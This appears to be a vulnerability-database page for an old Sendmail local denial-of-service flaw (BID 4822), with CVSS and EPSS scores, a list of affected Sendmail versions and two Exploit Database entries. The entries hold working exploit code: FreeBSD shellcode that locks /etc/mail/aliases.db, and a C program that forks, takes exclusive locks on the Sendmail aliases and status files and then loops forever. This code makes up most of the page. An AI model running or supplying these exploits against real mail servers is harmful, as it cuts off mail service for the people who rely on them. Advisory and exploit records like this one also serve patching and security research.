Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
2.1 |
|
AV:L/AC:L/Au:N/C:N/I:N/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 21476
Publication date : 2002-05-23 22h00 +00:00
Author : zillion
EDB Verified : Yes
/*
source: https://www.securityfocus.com/bid/4822/info
Sendmail is a MTA for Unix and Linux variants.
There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation.
*/
/*
FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
Written by zillion (at http://www.safemode.org && http://www.snosoft.com)
More info: http://www.sendmail.org/LockingAdvisory.txt
*/
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
"\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
"\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
"\x69\x61\x73\x65\x73\x2e\x64\x62";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
Exploit Database EDB-ID : 21477
Publication date : 2002-05-23 22h00 +00:00
Author : zillion
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/4822/info
Sendmail is a MTA for Unix and Linux variants.
There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation.
#include <fcntl.h>
#include <unistd.h>
/*
Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.
More info: http://www.sendmail.org/LockingAdvisory.txt
zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com
*/
int main() {
if(fork() == 0) {
char *lock1 = "/etc/mail/aliases";
char *lock2 = "/etc/mail/aliases.db";
char *lock3 = "/var/log/sendmail.st";
int fd;
fd = open(lock1,O_RDONLY);
flock(fd,0x02);
fd = open(lock2,O_RDONLY);
flock(fd,0x02);
fd = open(lock3,O_RDONLY);
flock(fd,0x02);
/* We are here to stay! */
for(;;) {}
}
}
Products Mentioned
Configuraton 0
Sendmail>>Sendmail >> Version 8.9.0
Sendmail>>Sendmail >> Version 8.9.1
Sendmail>>Sendmail >> Version 8.9.2
Sendmail>>Sendmail >> Version 8.9.3
Sendmail>>Sendmail >> Version 8.10
Sendmail>>Sendmail >> Version 8.10.1
Sendmail>>Sendmail >> Version 8.10.2
Sendmail>>Sendmail >> Version 8.11.0
Sendmail>>Sendmail >> Version 8.11.1
Sendmail>>Sendmail >> Version 8.11.2
Sendmail>>Sendmail >> Version 8.11.3
Sendmail>>Sendmail >> Version 8.11.4
Sendmail>>Sendmail >> Version 8.11.5
Sendmail>>Sendmail >> Version 8.11.6
Sendmail>>Sendmail >> Version 8.12
Sendmail>>Sendmail >> Version 8.12
Sendmail>>Sendmail >> Version 8.12
Sendmail>>Sendmail >> Version 8.12
Sendmail>>Sendmail >> Version 8.12
Sendmail>>Sendmail >> Version 8.12.0
Sendmail>>Sendmail >> Version 8.12.1
Sendmail>>Sendmail >> Version 8.12.2
Sendmail>>Sendmail >> Version 8.12.3
References